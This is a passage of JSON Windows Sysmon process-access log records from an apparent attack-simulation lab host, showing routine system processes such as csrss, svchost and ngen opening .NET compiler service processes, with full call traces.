C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.528","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010913F0C00}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.528\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-0010913F0C00}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.528","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-0010913F0C00}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.575\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105B430C00}\r\nTargetProcessId: 2316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.575","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105B430C00}","TargetProcessId":"2316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.575\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105B430C00}\r\nTargetProcessId: 2316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.575","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105B430C00}","TargetProcessId":"2316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.575\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00105B430C00}\r\nTargetProcessId: 2316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.575","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00105B430C00}","TargetProcessId":"2316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.606\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.606","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.606\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.606","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.622\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-00102E470C00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:10.622","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-00102E470C00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:10.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 